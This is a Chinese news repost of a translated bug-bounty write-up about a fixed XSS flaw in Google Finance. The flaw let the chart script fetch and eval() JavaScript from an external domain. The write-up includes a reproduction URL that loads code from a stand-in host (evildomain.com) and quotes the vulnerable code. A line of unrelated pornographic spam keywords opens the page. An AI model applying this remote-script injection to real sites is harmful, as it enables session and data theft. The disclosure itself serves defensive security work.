偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

在谷歌財經發(fā)現一個XSS漏洞,拿5千美元獎勵

開發(fā) 項目管理
這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執(zhí)行。

我們在6月13日發(fā)了一篇資訊, 說“Google調整漏洞獎勵計劃,單個漏洞***獎勵7,500美元”。7月30日看到 Michele Spagnuolo 發(fā)的博文稱“他在 Google Finance 上發(fā)現并提交了一個 XSS 漏洞,谷歌安全團隊確認并修復了該漏洞。Michele 因此拿到了 5K 美元獎勵。” 以下是 Michele 博文的譯文。

這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執(zhí)行。

這個過程不需要用戶交互,只要點擊一下URL就可以了。

復現步驟:

1)點擊該URL(目前已修復):

https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

文件x.js包含下列驗證代碼用來演示:

  1. alert(document.domain); 

該文件必須通過https來托管。

2)遠程Javascript被執(zhí)行。

工作原理

以下是 /finance/f/sfe-opt.js中的兩個代碼片段,它們引起了這個安全問題。

  1. c.push("ntsp="); 
  2. c.push(b); 
  3. if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || ""))); 
  4. return c.join("") 

在上面這段代碼中,URL參數,更確切的說是ntrssurl參數(用戶RSS源的地址)被獲取并進行了連接。

  1. Xi.prototype.send = function (a, b, c, d) { 
  2.     a = a || null; 
  3.     d = d || "_" + (Yi++).toString(36) + x().toString(36); 
  4.     n._callbacks_ || (n._callbacks_ = {}); 
  5.     var e = this.$s.Z(); 
  6.     if (a) 
  7.         for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); 
  8.     b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d)); 
  9.     b = Wi(e.toString(), { 
  10.         timeout: this.We, 
  11.         Ns: !0 
  12.     }); 
  13.     Si(b, null, $i(d, a, c), void 0); 
  14.     return { 
  15.         La: d, 
  16.         Du: b 
  17.     } 
  18. }; 

第二段代碼負責在外部域中查詢新聞源以將內容顯示在走勢圖中。

它生成一個回調函數名,以字串 “?_CALLBACK_”結尾。函數Wi對URL中的ntrssurl參數中的域名執(zhí)行xmlhttprequest操作。

然后,返回了一段簡單的Javascript代碼,并且通過eval()方法將其執(zhí)行。

http://s2.51cto.com/wyfs01/M00/14/03/wKioJlIBrH-h6OtvAAEZKFDEOAg537.jpg

觸發(fā)XSS漏洞的截圖

callback 請求截圖

有漏洞的代碼片段

這個安全隱患很快就被修復了,我因此得到了5000美元的獎勵。

非常感謝,Google安全小組!

原文鏈接:http://miki.it/blog/2013/7/30/xss-in-google-finance/

譯文鏈接:http://blog.jobbole.com/44953/

責任編輯:陳四芳 來源: 伯樂在線
相關推薦

2021-02-07 00:05:27

谷歌漏洞網絡安全

2021-03-15 09:50:01

漏洞網絡安全網絡攻擊

2020-12-09 19:31:57

Chrome谷歌漏洞

2010-04-30 15:45:09

2022-09-09 18:37:56

漏洞賞金開源

2020-10-09 07:49:17

黑客

2020-10-14 10:39:50

漏洞網絡攻擊網絡安全

2015-02-10 14:32:37

XSS漏洞XSS

2015-01-04 15:36:52

XSS漏洞XSS

2012-07-31 09:22:23

2015-03-26 14:04:57

2021-12-07 23:11:15

漏洞微軟谷歌

2022-01-26 07:47:22

黑客漏洞網絡安全

2010-06-11 17:08:05

2018-05-23 09:28:23

2013-05-13 10:24:44

谷歌開發(fā)團隊開發(fā)管理

2024-08-29 15:09:09

2022-09-01 13:48:01

漏洞獎勵計劃漏洞

2021-10-22 12:48:40

漏洞網絡安全網絡攻擊

2022-02-12 17:35:13

漏洞漏洞賞金谷歌
點贊
收藏

51CTO技術棧公眾號